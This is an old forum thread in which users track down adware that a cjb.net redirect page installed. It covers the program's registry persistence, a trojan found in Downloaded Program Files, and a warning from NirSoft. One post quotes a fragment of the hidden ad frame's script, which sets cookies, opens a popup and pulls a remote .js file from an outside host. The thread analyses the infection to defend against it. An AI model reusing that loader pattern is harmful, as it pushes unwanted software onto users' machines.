WTD: Delete program

D

dadiOH

omega said:
You know, I've gone back and glanced at the pages (cjb as address and
also http://www.utopiatemple.com/tutils/tdel.htm), with text ed, and
everything looks very clean. Not a touch of .js or anything. Where do
you connect that the site would load spyware?

When my registry monitor popped up when I loaded the page telling me
that the program was registering itself to start at boot time (can't
stop it doing so, deny permission and it just keeps on trying). And the
new directory: C:\Windows\Windows Control Ad (or some such). Can't
disable the startup from MSCONFIG because the program is running and
monitors same...uncheck it and it just writes a new entry.

It has an uninstall in add/remove programs but doesn't uninstall
completely. Seems to bugger AdAware too if not uninstalled before
running AdAware. After uninstalling AdAware cleans it up OK.

Got the same garbage from another cjb.net page a few days ago...a page
that I *know* used to be clean.

--
dadiOH
____________________________

dadiOH's dandies v3.05...
....a help file of info about MP3s, recording from
LP/cassette and tips & tricks on this and that.
Get it at http://mysite.verizon.net/xico
 
O

omega

dadiOH said:
When my registry monitor popped up when I loaded the page telling me
that the program was registering itself to start at boot time (can't
stop it doing so, deny permission and it just keeps on trying). And the
new directory: C:\Windows\Windows Control Ad (or some such). Can't
disable the startup from MSCONFIG because the program is running and
monitors same...uncheck it and it just writes a new entry.

It has an uninstall in add/remove programs but doesn't uninstall
completely. Seems to bugger AdAware too if not uninstalled before
running AdAware. After uninstalling AdAware cleans it up OK.

Got the same garbage from another cjb.net page a few days ago...a page
that I *know* used to be clean.

Thanks for explaining the story. Makes me glad for my browsers!

In Kmeleon, the source shows 100% clean. In MSIE, differently, I dug out
that there is an extra frame showing up in the source text.

<frame src="http://www.utopiatemple.com/tutils/tdel.htm">
<frame src="http://ads.cjbmanagement.com/frame/1103053443">

MSIE does not load that second frame for me visibly in any way. So I had
to launch it manually. I get empty, blank display (since active scripting
is set to a default of disabled). Source -

<script>
document.cookie="1103053676=gator;path=/";
document.cookie="gator=1103053676;path=/;expires="+new Date(new
Date().getTime()+604800000).toGMTString();
window1103053676=window.open('http://ads.cjbmanagement.com/window/1103053676'
[...]
if(window1103053676==null)document.write('<script
src="http://static.windupdates.com/prompts/a770ac7b/a072aa.js"><\/script>');
</script>

That must be the start point to the nasty in there, something that is led
to soon after - the spyware you speak of evidently uses Active-X controls.
Couldn't really explore much from there, garbage chars come out for source.
And no, definitely would not be interested in experiencing it directly. :)
 
S

Susan Bugher

dadiOH wrote:

When my registry monitor popped up when I loaded the page telling me
that the program was registering itself to start at boot time (can't
stop it doing so, deny permission and it just keeps on trying). And the
new directory: C:\Windows\Windows Control Ad (or some such). Can't
disable the startup from MSCONFIG because the program is running and
monitors same...uncheck it and it just writes a new entry.

It has an uninstall in add/remove programs but doesn't uninstall
completely. Seems to bugger AdAware too if not uninstalled before
running AdAware. After uninstalling AdAware cleans it up OK.

Got the same garbage from another cjb.net page a few days ago...a page
that I *know* used to be clean.

NirSoft *used* to have a cjb.net address - see:

http://64.233.167.104/search?q=cache:7ciAVG8fCJMJ:nirsoft.cjb.net/+&hl=en

<q>Important Notice
This Web address (http://nirsoft.cjb.net) is obsolete. You should avoid
using this old address, because the "free" redirection service of
cjb.net tries to install spywares/adwares on computers that browse my
Web site through this address.
If you are asked to install something on your computer, click the "No"
button !!
</q>

Susan
 
D

dadiOH

omega said:
Thanks for explaining the story. Makes me glad for my browsers!

In Kmeleon, the source shows 100% clean. In MSIE, differently, I dug
out that there is an extra frame showing up in the source text.

Might be clean, found a trojan - Win32.StartPage.kv - hiding out in
C:\Windows\Downloaded Program Files. That being one of those special
"directories", not everything in it shows.

More on it here...
http://www.sophos.com/virusinfo/analyses/trojstartpakv.html

--
dadiOH
____________________________

dadiOH's dandies v3.05...
....a help file of info about MP3s, recording from
LP/cassette and tips & tricks on this and that.
Get it at http://mysite.verizon.net/xico
 

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments. After that, you can post your question and our members will help you out.

Ask a Question

Similar Threads

I am looking for a virtual CD drive program... 13
A brief message... 21
Sony Burning Program 18
CD recovery 15
Chart/graph program 2
Dual boot files 2
Dual boot win98 and XP but W in98 won't :( 15
OE won't load 25

Top